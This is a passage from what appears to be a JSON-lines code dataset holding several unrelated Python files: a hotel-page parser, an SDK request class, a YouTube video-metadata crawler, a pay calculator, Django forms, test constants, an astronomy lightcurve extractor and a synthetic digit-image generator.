html_file):\n\t\tsuper(ExpediaParser, self).__init__(html_file)\n\t\tself.hotel_name_selector = '.hotelWrapper .segment.hotel .details.showMile .infoCol .hotelName.fakeLink .hotelName strong'\n\t\tself.price_selector = '.hotelWrapper .segment.hotel .details.showMile .priceCol .price'\n\t\tself.city_selector = 'header[id=\"hotelResultTitle\"] .section-header-main'\n\t\tself.date_in_selector = 'input[id=\"inpStartDate\"]'\n\t\tself.date_out_selector = 'input[id=\"inpEndDate\"]'\n\t\tself.hotel_adfilter_selector = '.hotelWrapper .segment.hotel.travelAd .details.showMile .infoCol .hotelName.fakeLink .hotelName strong'\n\t\tself.price_adfilter_selector = '.hotelWrapper .segment.hotel.travelAd .details.showMile .priceCol .price'\n\n\tdef parse_date_in(self):\n\t\tdate_in = self.root.cssselect(self.date_in_selector)\n\t\treturn date_in[0].value\n\n\tdef parse_date_out(self):\n\t\tdate_out = self.root.cssselect(self.date_out_selector)\n\t\treturn date_out[0].value\n\n\tdef parse_date(self):\n\t\ttry:\n\t\t\tdate = self.parse_date_in() + '-' + self.parse_date_out()\n\t\t\tif date == '01/21/2014-01/22/2014':\n\t\t\t\treturn 'A'\n\t\t\telif date == '12/27/2013-01/04/2014':\n\t\t\t\treturn 'B'\n\t\t\telif date == '05/09/2014-05/17/2014':\n\t\t\t\treturn 'C'\n\t\texcept: pass\n\t\treturn 'Z'\n\n\tdef parse_city(self):\n\t\ttry:\n\t\t\tmy_city = self.root.cssselect(self.city_selector)[0].text_content()\n\t\t\tfor city in self.city_list:\n\t\t\t\tif my_city.lower() in city.lower() or city.lower() in my_city.lower():\n\t\t\t\t\treturn city \n\t\texcept: pass\n\t\treturn None\n\n\n\tdef parse_prices(self):\n\t\tacc = []\n\t\tprices = self.root.cssselect(self.price_selector)\n\t\tfiltered = self.root.cssselect(self.price_adfilter_selector)\n\t\tprices = [price for price in prices if price not in filtered]\n\t\tfor price in prices:\n\t\t\tif len(price) == 1:\n\t\t\t\tmy_price = price[0].text_content().strip().replace('$', '').replace(',', '')\n\t\t\telse:\n\t\t\t\tmy_price = price[1].text_content().strip().replace('$', '').replace(',', '')\n\t\t\tacc.append(my_price)\n\t\treturn acc\n\n\tdef parse_hotels(self):\n\t\tacc = []\n\t\thotels = self.root.cssselect(self.hotel_name_selector)\n\t\tfiltered = self.root.cssselect(self.hotel_adfilter_selector)\n\t\thotels = [hotel for hotel in hotels if hotel not in filtered]\n\t\tfor hotel in hotels:\n\t\t\tacc.append(hotel.text_content().strip())\n\t\treturn acc\n","sub_path":"own_parsers/hotel/expedia.py","file_name":"expedia.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"514060036","text":"'''\nCreated by auto_sdk on 2016.04.05\n'''\nfrom tmallsdk.api.base import RestApi\nclass AlitripTicketItemBaseAddRequest(RestApi):\n\tdef __init__(self,domain='gw.api.taobao.com',port=80):\n\t\tRestApi.__init__(self,domain, port)\n\t\tself.buy_limit = None\n\t\tself.eticket_info = None\n\t\tself.item_base_info = None\n\t\tself.item_sale_info = None\n\n\tdef getapiname(self):\n\t\treturn 'taobao.alitrip.ticket.item.base.add'\n","sub_path":"tmallsdk/api/rest/AlitripTicketItemBaseAddRequest.py","file_name":"AlitripTicketItemBaseAddRequest.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"150451393","text":"#-*-coding:utf-8-*-\n# 作者:Li Dong\nimport time\nimport json\nfrom urllib import request\nfrom urllib import error\nfrom lxml import etree\n\n\ndef token_next_substracter(url):\n \"\"\"\n 爬取一个Youtube博主所有发布的视频的json页面的url里的两个参数\n @param url: 该博主主页的url(选项卡要选中“视频”)\n @type url: str\n @return: 形如(Mytoken, NextContinuationParams)的元组\n @rtype: tuple\n \"\"\"\n global headers\n rqo = request.Request(url, headers=headers)\n while(True):\n try:\n rp = request.urlopen(rqo).read().decode(\"utf-8\")\n break;\n except (error.HTTPError, error.URLError, ConnectionRefusedError):\n pass\n # 前30个视频的信息直接就放在上面请求之后获得的静态HTML里,准确说把信息放在json里,json放在一个javascript里\n # 所以用xpath把js取出来以后,切割字符串获得里面的json部分\n html_dom = etree.HTML(rp)\n list_Script = html_dom.xpath(\"body/script/text()\")\n # print(list_Script)\n KeyScript = list_Script[1]\n processed_KeyScript = KeyScript[len(\"\t window[\\\"ytInitialData\\\"] = \"): KeyScript.find(\";\\n\")]\n # 数据提取\n dict_KeyScript = json.loads(processed_KeyScript)\n # 结构复杂的json,不知道有没有高效的方法可以一下子找到到达某个内容的路径\n gridRenderer = dict_KeyScript[\"contents\"][\"twoColumnBrowseResultsRenderer\"][\"tabs\"][1][\"tabRenderer\"][\"content\"]['sectionListRenderer']['contents'][0]['itemSectionRenderer'][\"contents\"][0]['gridRenderer']\n list_gridVideoRenderer = gridRenderer[\"items\"]\n for item in list_gridVideoRenderer:\n gridVideoRenderer = item[\"gridVideoRenderer\"]\n videoID = gridVideoRenderer[\"videoId\"]\n title = gridVideoRenderer[\"title\"][\"simpleText\"].replace(\",\", \"|\")\n publishedTime = gridVideoRenderer[\"publishedTimeText\"][\"simpleText\"]\n ViewCount = gridVideoRenderer[\"viewCountText\"][\"simpleText\"].replace(\",\", \"\")\n written_content = \",\".join([videoID, title, publishedTime, ViewCount])\n with open(\"D:\\\\xxx.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(written_content)\n f.write(\"\\n\")\n dict_continuations = gridRenderer[\"continuations\"][0]\n MyToken = dict_continuations[\"nextContinuationData\"][\"continuation\"]\n NextContinuationParams = dict_continuations[\"nextContinuationData\"][\"clickTrackingParams\"]\n return (MyToken, NextContinuationParams)\n\n\ndef youtube_crawler(tuple_info):\n \"\"\"\n 爬取一个Youtube博主所有发布的视频的ID、标题、发布时间和浏览数四项信息\n @param tuple_info: 形如(Mytoken, NextContinuationParams)的元组\n @type tuple_info: tuple\n @return: 形如(Mytoken, NextContinuationParams)的元组\n @rtype: tuple\n \"\"\"\n global headers\n # 如果实参为空元组,直接返回,结束函数\n if tuple_info == ():\n return ()\n else:\n # 先从形参里把url里两个必须的参数取出来\n NextContinuationParams = tuple_info[1]\n MyToken = tuple_info[0]\n # 组装URL并发送请求\n json_url = \"https://www.youtube.com/browse_ajax?ctoken=\" + MyToken + \"&continuation=\" + MyToken + \"&itct=\" + NextContinuationParams\n rqo_json = request.Request(json_url, headers=headers)\n # 访问URL,获得json\n while (True):\n try:\n rp_json = request.urlopen(rqo_json).read().decode(\"utf-8\")\n break;\n except (error.HTTPError, error.URLError, ConnectionRefusedError):\n pass\n # 数据提取\n list_rp = json.loads(rp_json)\n dict_params = list_rp[1]\n gridContinuation = dict_params[\"response\"][\"continuationContents\"][\"gridContinuation\"]\n list_gridVideoRenderer = gridContinuation[\"items\"]\n for item in list_gridVideoRenderer:\n gridVideoRenderer = item[\"gridVideoRenderer\"]\n videoID = gridVideoRenderer[\"videoId\"]\n title = gridVideoRenderer[\"title\"][\"simpleText\"].replace(\",\", \"|\")\n publishedTime = gridVideoRenderer[\"publishedTimeText\"][\"simpleText\"]\n ViewCount = gridVideoRenderer[\"viewCountText\"][\"simpleText\"].replace(\",\", \"\")\n written_content = \",\".join([videoID, title, publishedTime, ViewCount])\n with open(\"D:\\\\xxx.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(written_content)\n f.write(\"\\n\")\n # 如果到了视频的最后一页,返回的json中键不存在“continuations”,最后一页,当然不存在下一页的信息\n try:\n dict_continuations = gridContinuation[\"continuations\"][0]\n MyToken = dict_continuations[\"nextContinuationData\"][\"continuation\"]\n NextContinuationParams = dict_continuations[\"nextContinuationData\"][\"clickTrackingParams\"]\n return (MyToken, NextContinuationParams)\n except KeyError:\n return ()\n\n\nif __name__ == '__main__':\n start_time = time.time()\n print(\"start time:\", time.ctime())\n url = \"https://www.youtube.com/channel/XXXXXXXXXXXXXXXXXXX/videos\"\n # 请求头里的其他可以不要,这四样内容一个都不能少\n # 并且,这个只是不登陆的时候使用的请求头;如果登陆了,下面的cookie会变复杂,而且还需要其他的项\n # 不登陆虽然请求头简单一点,但是如果某个中文视频有做好的英文翻译,它就默认传那个英文内容给你\n headers = {\n \"User-Agent\": \"XXXXXX\",\n \"X-YouTube-Client-Name\": \"XXX\",\n \"X-YouTube-Client-Version\": \"XXXXX\",\n \"Cookie\": \"XXX\"\n }\n tuple_info = token_next_substracter(url)\n # print(tuple_info)\n tuple_next_info = youtube_crawler(tuple_info)\n # print(tuple_next_info)\n while tuple_next_info != ():\n tuple_next_info = youtube_crawler(tuple_next_info)\n # print(tuple_next_info)\n ending_time = time.time()\n print(\"end time:\", time.ctime())\n print(\"lasting time:\", ending_time - start_time)\n\n\n","sub_path":"src/youtube_video_info_crawler.py","file_name":"youtube_video_info_crawler.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"483606839","text":"# encoding: UTF-8\n\n# Autor: Iván Alejandro Dumas Martínez\n# Descripción: Este programa lee las horas normales, horas extra y pago por hora de un trabajador y calcula el total semanal\n\ndef calcularPagoNormal(pagoHora, hrsNormal): # Función que calcula el pago por las horas normales trabajadas\n pagoNormal = pagoHora * hrsNormal\n return pagoNormal\n\n\ndef calcularPagoExtra(pagoHora, hrsExtra): # Función que calcula el pago por las horas extra trabajadas\n pagoExtra = pagoHora * 1.5 * hrsExtra\n return pagoExtra\n\n\ndef main(): # Función principal\n hrsNormal = int(input(\"Teclea las horas normales trabajadas: \"))\n hrsExtra = int(input(\"Teclea las horas extras trabajadas: \"))\n pagoHora = int(input(\"Teclea el pago por hora: $\"))\n pagoNormal = calcularPagoNormal(pagoHora, hrsNormal)\n pagoExtra = calcularPagoExtra(pagoHora, hrsExtra)\n pagoTotal = pagoNormal + pagoExtra\n print (\"\"\"Pago normal: $%.2f\nPago extra: $%.2f\n----------------------\nPago total: $%.2f\"\"\" % (pagoNormal, pagoExtra, pagoTotal))\n\n\n# Llamar a la función principal\nmain()\n","sub_path":"pago.py","file_name":"pago.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"414555962","text":"from django import forms\nfrom .models import Article, Commentaire, Projet, CommentaireProjet\nfrom django.utils.text import slugify\nimport itertools\nfrom django.utils.timezone import now\n#from django.utils.formats import localize\n#from tinymce.widgets import TinyMCE\nfrom django_summernote.widgets import SummernoteWidget\n\nclass ArticleForm(forms.ModelForm):\n # contenu = TinyMCE(attrs={'cols': 80, 'rows': 20})\n estPublic = forms.ChoiceField(choices=((1, \"Article public\"), (0, \"Article Permacat\")), label='', required=True, )\n\n class Meta:\n model = Article\n fields = ['categorie', 'titre', 'contenu', 'estPublic', 'estModifiable']\n widgets = {\n 'contenu': SummernoteWidget(),\n # 'bar': SummernoteInplaceWidget(),\n }\n\n def save(self, userProfile):\n instance = super(ArticleForm, self).save(commit=False)\n\n max_length = Article._meta.get_field('slug').max_length\n instance.slug = orig = slugify(instance.titre)[:max_length]\n\n for x in itertools.count(1):\n if not Article.objects.filter(slug=instance.slug).exists():\n break\n\n # Truncate the original slug dynamically. Minus 1 for the hyphen.\n instance.slug = \"%s-%d\" % (orig[:max_length - len(str(x)) - 1], x)\n\n instance.auteur = userProfile\n if not userProfile.is_permacat:\n instance.estPublic = True\n\n instance.save()\n\n return instance\n\n\n def __init__(self, request, *args, **kwargs):\n super(ArticleForm, self).__init__(request, *args, **kwargs)\n self.fields['contenu'].strip = False\n\nclass ArticleChangeForm(forms.ModelForm):\n estPublic = forms.ChoiceField(choices=((1, \"Article public\"), (0, \"Article réserve aux adhérents\")), label='', required=True)\n\n class Meta:\n model = Article\n fields = ['categorie', 'titre', 'contenu', 'estPublic', 'estModifiable', 'estArchive']\n widgets = {\n 'contenu': SummernoteWidget(),\n }\n\n\n def __init__(self, *args, **kwargs):\n super(ArticleChangeForm, self).__init__(*args, **kwargs)\n self.fields['contenu'].strip = False\n self.fields[\"estPublic\"].choices=((1, \"Article public\"), (0, \"Article réservé aux adhérents\")) if kwargs['instance'].estPublic else ((0, \"Article réserve aux adhérents\"),(1, \"Article public\"), )\n\n\n\n# def save(self,):\n# instance = super(ArticleChangeForm, self).save(commit=False)\n# instance.date_modification = now\n# # instance.save()\n# return instance\n\nclass CommentForm(forms.ModelForm):\n #commentaire = TinyMCE(attrs={'cols': 1, 'rows': 1, 'height':10 })\n\n class Meta:\n model = Commentaire\n exclude = ['article','auteur_comm']\n #\n widgets = {\n # 'commentaire': SummernoteWidget(),\n 'commentaire': forms.Textarea(attrs={'rows': 1}),\n }\n\n def __init__(self, request, *args, **kwargs):\n super(CommentForm, self).__init__(request, *args, **kwargs)\n self.fields['commentaire'].strip = False\n\nclass ProjetForm(forms.ModelForm):\n #contenu = forms.CharField(widget=forms.Textarea(attrs={'cols': 80, 'rows': 10}))\n #contenu = TinyMCE(attrs={'cols': 80, 'rows': 20})\n estPublic = forms.ChoiceField(choices=((1, \"Projet public\"), (0, \"Projet Permacat\")), label='', required=True)\n\n class Meta:\n model = Projet\n fields = ['categorie', 'coresponsable', 'titre', 'contenu', 'statut', 'estPublic', 'lien_document', 'fichier_projet', 'lien_vote',]\n widgets = {\n 'contenu': SummernoteWidget(),\n }\n\n def __init__(self, request, *args, **kwargs):\n super(ProjetForm, self).__init__(request, *args, **kwargs)\n self.fields['contenu'].strip = False\n\n def save(self, userProfile):\n instance = super(ProjetForm, self).save(commit=False)\n\n max_length = Projet._meta.get_field('slug').max_length\n instance.slug = orig = slugify(instance.titre)[:max_length]\n\n for x in itertools.count(1):\n if not Projet.objects.filter(slug=instance.slug).exists():\n break\n\n # Truncate the original slug dynamically. Minus 1 for the hyphen.\n instance.slug = \"%s-%d\" % (orig[:max_length - len(str(x)) - 1], x)\n\n instance.auteur = userProfile\n\n if not userProfile.is_permacat:\n instance.estPublic = True\n\n instance.save()\n\n return instance\n\n\nclass ProjetChangeForm(forms.ModelForm):\n estPublic = forms.ChoiceField(choices=((1, \"Projet public\"), (0, \"Projet réservé aux adhérents\")), label='', required=True)\n\n class Meta:\n model = Projet\n fields = ['categorie', 'coresponsable', 'titre', 'contenu', 'estPublic', 'lien_document','fichier_projet', 'lien_vote', 'estArchive']\n widgets = {\n 'contenu': SummernoteWidget(),\n }\n\n def __init__(self, *args, **kwargs):\n super(ProjetChangeForm, self).__init__(*args, **kwargs)\n self.fields['contenu'].strip = False\n self.fields[\"estPublic\"].choices = ((1, \"Article public\"), (0, \"Article réserve aux adhérents\")) if kwargs[\n 'instance'].estPublic else ((0, \"Projet réservé aux adhérents\"), (1, \"Projet public\"),)\n\n\nclass CommentProjetForm(forms.ModelForm):\n class Meta:\n model = CommentaireProjet\n exclude = ['projet','auteur_comm']\n\n widgets = {\n 'commentaire': forms.Textarea(attrs={'rows': 1}),\n }\n\n def __init__(self, request, *args, **kwargs):\n super(CommentProjetForm, self).__init__(request, *args, **kwargs)\n self.fields['commentaire'].strip = False","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"148097961","text":"# -*- coding:utf-8 -*-\nimport os\n\n__author__ = 'Mily-V'\n\n\nBASE_URL = 'http://ftest.stud.tech-mail.ru'\nPATH = ''\nBLOG = 'Флудилка'\nTITLE = u'ЗаГоЛоВоК'\nSHORT_TEXT = u'Отображается в блогах'\nMAIN_TEXT = u'Отображается внутри топика'\nNAME_USER = u'Господин Манилов'\nREFERENCE = 'https://github.com/'\nFIX_IMAGE = 'http://knigy-dlya-vseh.ru/pictures/chitatel/gogol/manilov_boklevskij2.jpg'\nLOAD_IMAGE = '/../foto.jpg'\nADD_USER = u'Корольков'\nUSER = 'http://ftest.stud.tech-mail.ru/profile/a.korolkov/'\nQUESTION = u'Вопрос'\nANSWER1 = u'Ответ1'\nANSWER2 = u'Ответ2'\nLOGIN = 'ftest15@tech-mail.ru'\nPASSWORD = os.environ['TTHA2PASSWORD']\nLIMIT_TITLE = 251\nLONG_TITLE = '*'*LIMIT_TITLE","sub_path":"pages/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"165922046","text":"#!/usr/bin/python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob\nimport astropy.io.fits as fits\nimport os\n\n\"\"\"\nScript to extract a lightcurve from HST/COS corrtag files\nTested on FUV so far, NUV to come.\nRequires astropy, matplotlib, numpy. \nSaves each FP_POS exposure separately, as well as one combined file.\nFor each exposure the counts from the A and B segments, if both present, are combined.\nAirglow from Lymman alpha and ~1300A Oi is removed.\nError is photon noise only. \nOptional: Plots combined lightcurve. \n\nUsage: call the function lc_maker()\n\nlc_extractor.lc_maker(star='unknown', file_path=os.getcwd()+'/', save_path=os.getcwd()+'/lightcurves/', bin_time=1., plot=True)\n\nArguments: \n\t-star = string, what you want the combined line curve to be called. \n\tDefault is to use the 'TARGNAME' keyword in the first corrtag file it comes across.\n\t- file_path = string, where your corrtag files are. Default is the curret directory.\n\t- save_path = sring, where you want the output to be saves. \n\tDefault is a new \"lightcurves\" directory in the current directory\n\t- bin_time = float, time in s to bin the lightcurve to. Default is 1.0s.\n\t- qual_check = boolean, masks out flagged pixels. Default is True.\n\t- plot = boolean, makes a plot of the combined lightcurve. Default is True.\n\t\nOutputs: \n\t- Lightcurve of each exposure saved as [exposure rootname]_[bintime]s_lc.dat.\n\t- Combined lightcurve saved as [star]_[bin_time]s_lc_combined.dat.\n\tLightcurves saved as time(s since MJD=0) counts(s-1) error(s-1). \n\n\"\"\"\n\ndef region_mask(x, y, slope, intercept, height):\n\tmask = (y > slope*x+intercept-height/2.) & (y < slope*x+intercept+height/2.)\n\treturn mask \n\t\ndef ensure_dir(d):\n\tif not os.path.exists(d):\n\t\tos.makedirs(d)\n\t\ndef filewriter(time, counts, error, save_path, filename): \n\t# writes lightcurves to dat files\n\tensure_dir(save_path)\n\tfl=open((save_path+filename),'w')\n\tfor t, c, e in zip(time, counts, error):\n\t fl.write('%f %f %f\\n'%(t, c, e))\n\ndef lc_maker(star='unknown', file_path=os.getcwd()+'/', \n save_path=os.getcwd()+'/lightcurves/', bin_time=1., \n qual_check=True, plot=True):\n\n\t#find the corrtag files, and end the script if there aren't any\n\ttag_files = glob.glob(file_path+'*corrtag*')\n\tif len(tag_files) == 0:\n\t\tprint ('There are no corrtag files in file_path :(.')\n\t\tos._exit(1)\n\t\n\t#find all rootnames\n\trootnames = np.array([], dtype=str)\n\tfor tag in tag_files:\n\t\trootnames= np.append(rootnames, fits.open(tag)[0].header['ROOTNAME'])\n\trootnames = np.unique(rootnames)\n\t\n\t#make arrays to store combined lightcurve in\n\tall_time = np.array([], dtype=float)\n\tall_counts = np.array([], dtype=float)\n\tall_error = np.array([], dtype =float)\n\t\n\tfor rootname in rootnames:\n\t\t\n\t\t#checks if both segments are available \n\t\tsegs = ['a', 'b']\n\t\tif (file_path+rootname+'_corrtag_a.fits') not in tag_files:\n\t\t\tsegs = ['b']\n\t\tif (file_path+rootname+'_corrtag_b.fits') not in tag_files:\n\t\t\tsegs = ['a']\n\t\n\t\tfor seg in segs:\n\t\t\ttag_file = rootname+'_corrtag_'+seg+'.fits'\n\t\n\t\t\tseg = seg.upper() #header keywords are uppercase\n\t\t\t\n\t\t\thdul = fits.open(file_path+tag_file)\n\t\t\theader = hdul[1].header\n\t\t\tdata = hdul[1].data\n\t\t\t\n\t\t\t#get target name\n\t\t\tif star == 'unknown':\n\t\t\t\tstar = hdul[0].header['TARGNAME']\n\t\t\t\n\t\t\t#binning to achive bin_time\n\t\t\tbins = int(header['EXPTIME']/bin_time)\n\t\t\t\n\t\t\t#values for extraction regions\n\t\t\tslope = header['SP_SLP_'+seg]\n\t\t\tsp_intercept = header['SP_LOC_'+seg]\n\t\t\tsp_height = float(header['SP_HGT_'+seg])\n\t\t\t\n\t\t\t#background regions\n\t\t\tbk1_intercept = header['B_BKG1_'+seg]\n\t\t\tbk1_height = float(header['B_HGT1_'+seg])\n\t\t\tbk2_intercept = header['B_BKG1_'+seg]\n\t\t\tbk2_height = float(header['B_HGT1_'+seg])\n\t\t\t\n\t\t\t#data \n\t\t\tx = data['XCORR']\n\t\t\ty = data['YCORR']\n\t\t\ttime = data['TIME']\n\t\t\tw = data['WAVELENGTH']\n\t\t\tdq = data['DQ']\n\t\t\t\n\t\t\t#mask out flagged pixels\n\t\t\tif qual_check == True:\n\t\t\t\tx, y, time, w = x[dq==0], y[dq==0], time[dq==0], w[dq==0]\n\t\t\t\n\t\t\t#mask out airglow from lyman alpha and oi\n\t\t\twave_mask = (w < 1214.)|(w > 1217.)&(w < 1301.)|(w > 1307.)\n\t\t\tx, y, time = x[wave_mask], y[wave_mask], time[wave_mask]\n\t\t\t\n\t\t\t#extract lightcurve from spectrum\n\t\t\tsp_mask = region_mask(x, y, slope, sp_intercept, sp_height)\n\t\t\tsp_lc = np.histogram(time[sp_mask], bins)\n\t\t\tt,sp_counts = sp_lc[1][:-1], sp_lc[0]\n\t\t\t\n\t\t\t#background\n\t\t\tbk1_mask = region_mask(x, y, slope, bk1_intercept, bk1_height)\n\t\t\tbk1_lc = np.histogram(time[bk1_mask], bins)\n\t\t\tbk2_mask = region_mask(x, y, slope, bk2_intercept, bk2_height)\n\t\t\tbk2_lc = np.histogram(time[bk2_mask], bins)\n\t\t\tbk_counts = (bk1_lc[0]+bk2_lc[0])*(sp_height/(bk1_height+bk2_height)) #sum background counts and normalise to spectrum area\n\t\t\t\n\t\t\t#background subtraction \n\t\t\tcounts_bksub = sp_counts - bk_counts \n\t\t\t\n\t\t\t#combine a and b segments, if both present\n\t\t\tif len(segs) > 1: \n\t\t\t\tif seg == 'A':\n\t\t\t\t\tcounts = counts_bksub\n\t\t\t\telse:\n\t\t\t\t\tcounts += counts_bksub\n\t\t\telse:\n\t\t\t\tcounts = counts_bksub\n\t\t\t\n\t\t\t#calculate photon noise\n\t\t\terror = counts**0.5 \n\t\t\t\n\t\t\t#convert time to absolute time\n\t\t\tt_adg = t + (header['EXPSTART']*86400.)\n\t\t\t\n\t\t\t#convert to counts s-1 \n\t\t\tcounts_sec = counts/bin_time\n\t\t\terror_sec = error/bin_time\n\t\t\t\n\t\tfilewriter(t_adg, counts_sec, error_sec, save_path, rootname+'_'+str(bin_time)+'s_lc.dat')\n\t\t\t\n\t\tall_time = np.concatenate((all_time, t_adg), axis =0)\t\n\t\tall_counts = np.concatenate((all_counts, counts_sec))\n\t\tall_error = np.concatenate((all_error, error_sec))\n\t\n\tfilewriter(all_time, all_counts, all_error, save_path, star+'_'+str(bin_time)+'s_lc_combined.dat') \n\t\t\n\tif plot == True:\n\t\tplot_lc(star, all_time, all_counts, all_error, bin_time)\n\ndef plot_lc(star, time, counts, error, bin_time):\n\tplt.figure(star+'_'+str(bin_time)+'s')\n\tplt.subplots_adjust(top=0.99, right =0.99)\n\tplt.errorbar(time-time[0], counts, yerr = error, ls='none', marker='o')\n\tplt.xlabel('Time (s)', size=20)\n\tplt.ylabel('Counts (s$^{-1}$)', size=20)\n\tplt.show()\n\t\n\n","sub_path":"lc_extractor.py","file_name":"lc_extractor.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"293418451","text":"# input: image include some digits\n# output: digits label\nimport math\nimport os\nimport random\nimport sys\n\nimport cv2\nimport numpy\nimport numpy as np\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nOUTPUT_SHAPE = (32, 120)\nDIGITS = '0123456789'\n\nLENGTHS = [3,4,5]\n#n_len = 7\nFONT_HEIGHT = 28\nfonts = ['fonts/huawenxihei.ttf']\nbg_path = 'bgs/'\n\nbg_file_list = os.listdir(bg_path)\nbg_nums = len(bg_file_list)\n\ndef euler_to_mat(yaw, pitch, roll):\n # Rotate clockwise about the Y-axis\n c, s = math.cos(yaw), math.sin(yaw)\n M = numpy.matrix([[c, 0., s],\n [0., 1., 0.],\n [-s, 0., c]])\n\n # Rotate clockwise about the X-axis\n c, s = math.cos(pitch), math.sin(pitch)\n M = numpy.matrix([[1., 0., 0.],\n [0., c, -s],\n [0., s, c]]) * M\n\n # Rotate clockwise about the Z-axis\n c, s = math.cos(roll), math.sin(roll)\n M = numpy.matrix([[c, -s, 0.],\n [s, c, 0.],\n [0., 0., 1.]]) * M\n\n return M\n\n\ndef make_affine_transform(from_shape, to_shape,\n min_scale, max_scale,\n scale_variation=1.0,\n rotation_variation=1.0,\n translation_variation=1.0):\n out_of_bounds = False\n\n from_size = numpy.array([[from_shape[1], from_shape[0]]]).T\n to_size = numpy.array([[to_shape[1], to_shape[0]]]).T\n\n scale = random.uniform((min_scale + max_scale) * 0.5 -\n (max_scale - min_scale) * 0.5 * scale_variation,\n (min_scale + max_scale) * 0.5 +\n (max_scale - min_scale) * 0.5 * scale_variation)\n\n if scale > max_scale or scale < min_scale:\n out_of_bounds = True\n roll = random.uniform(-0.3, 0.3) * rotation_variation\n pitch = random.uniform(-0.2, 0.2) * rotation_variation\n yaw = random.uniform(-1.2, 1.2) * rotation_variation\n # Compute a bounding box on the skewed input image (`from_shape`).\n M = euler_to_mat(yaw, pitch, roll)[:2, :2]\n h, w = from_shape[0:2]\n corners = numpy.matrix([[-w, +w, -w, +w],\n [-h, -h, +h, +h]]) * 0.5\n skewed_size = numpy.array(numpy.max(M * corners, axis=1) -\n numpy.min(M * corners, axis=1))\n\n # Set the scale as large as possible such that the skewed and scaled shape\n # is less than or equal to the desired ratio in either dimension.\n scale *= numpy.min(to_size / skewed_size) * 1.1\n\n # Set the translation such that the skewed and scaled image falls within\n # the output shape's bounds.\n trans = (numpy.random.random((2, 1)) - 0.5) * translation_variation\n trans = ((2.0 * trans) ** 5.0) / 2.0\n if numpy.any(trans < -0.5) or numpy.any(trans > 0.5):\n out_of_bounds = True\n trans = (to_size - skewed_size * scale) * trans\n\n center_to = to_size / 2.\n center_from = from_size / 2.\n\n M = euler_to_mat(yaw, pitch, roll)[:2, :2]\n\n M *= scale\n M = numpy.hstack([M, trans + center_to - M * center_from])\n\n return M, out_of_bounds\n\n\n# -----------------generate label----------------\ndef generate_label(length):\n f = \"\"\n #length = random.choice(LENGTHS)\n\n for _ in range(length):\n f = f + random.choice(DIGITS)\n return f\n\n\n# ----------------generate bg---------------------\ndef generate_bg(bg_pic_num=bg_nums):\n while True:\n fname = \"bgs/{:08d}.png\".format(random.randint(0, bg_pic_num - 1))\n bg = cv2.imread(fname) / 255.0\n\n if (bg.shape[1] >= OUTPUT_SHAPE[1] and bg.shape[0] >= OUTPUT_SHAPE[0]):\n x = random.randint(0, bg.shape[1] - OUTPUT_SHAPE[1])\n y = random.randint(0, bg.shape[0] - OUTPUT_SHAPE[0])\n bg = bg[y:y + OUTPUT_SHAPE[0], x:x + OUTPUT_SHAPE[1]]\n break\n\n return bg\n\n\n# ---------------------make char image----------------------------\ndef make_char_ims(output_height, font):\n font_size = output_height * 1\n font = ImageFont.truetype(font, font_size)\n height = max(font.getsize(d)[1] for d in DIGITS)\n for c in DIGITS:\n width = font.getsize(c)[0]\n im = Image.new(\"RGBA\", (width, height), (255, 255, 255))\n draw = ImageDraw.Draw(im)\n draw.text((0, 0), c, (0, 0, 0), font=font)\n scale = float(output_height) / height\n im = im.resize((int(width * scale), int(output_height * scale)), Image.ANTIALIAS)\n yield c, numpy.array(im)[:, :, 0].astype(numpy.float32) / 255.\n\n\ndef get_all_font_char_ims(out_height):\n result = []\n for font in fonts:\n result.append(dict(make_char_ims(out_height, font)))\n return result\n\n\ndef generate_plate(font_height, char_ims, text_color, length):\n h_padding = 0 # random.uniform(0.2, 0.3) * font_height#(0.2,0.4)\n v_padding = h_padding # random.uniform(0.1, 0.3) * font_height\n spacing = font_height * random.uniform(0.01, 0.05)\n radius = 1 # + int(font_height * 0.1 * random.random())\n code = generate_label(length)\n text_width = sum(char_ims[c].shape[1] for c in code)\n text_width += (len(code) - 1) * spacing\n\n out_shape = (int(font_height + v_padding * 2),\n int(text_width + h_padding * 2), 3)\n\n text_mask = numpy.ones(out_shape)\n\n x = h_padding\n y = v_padding\n pos = np.zeros(shape=(len(code), 2), dtype=np.float)\n for index, c in enumerate(code):\n char_im = char_ims[c]\n # print(char_im.shape)\n ix, iy = int(x), int(y)\n text_mask[iy:iy + char_im.shape[0], ix:ix + char_im.shape[1], 0] = char_im\n text_mask[iy:iy + char_im.shape[0], ix:ix + char_im.shape[1], 1] = char_im\n text_mask[iy:iy + char_im.shape[0], ix:ix + char_im.shape[1], 2] = char_im\n x += char_im.shape[1] + spacing\n pos[index][0] = ix\n pos[index][1] = iy\n plate = (text_color * text_mask)\n\n return plate, code, pos\n\n\ndef generate_im(char_ims, length):\n text_color = random.uniform(0.5, 1.0)\n bg = generate_bg()\n while True:\n plate, label, pos = generate_plate(FONT_HEIGHT, char_ims, text_color, length)\n M, out_of_bounds = make_affine_transform(\n from_shape=plate.shape,\n to_shape=bg.shape,\n min_scale=0.9,\n max_scale=1.0,\n rotation_variation=0.02,\n scale_variation=1.0,\n translation_variation=0.4)\n\n mask = np.ones((plate.shape[0], plate.shape[1], 3), dtype=np.float32)\n plate = cv2.warpAffine(plate, M, (bg.shape[1], bg.shape[0]))\n mask = cv2.warpAffine(mask, M, (bg.shape[1], bg.shape[0]))\n\n out = plate * bg + text_color * bg * (1 - 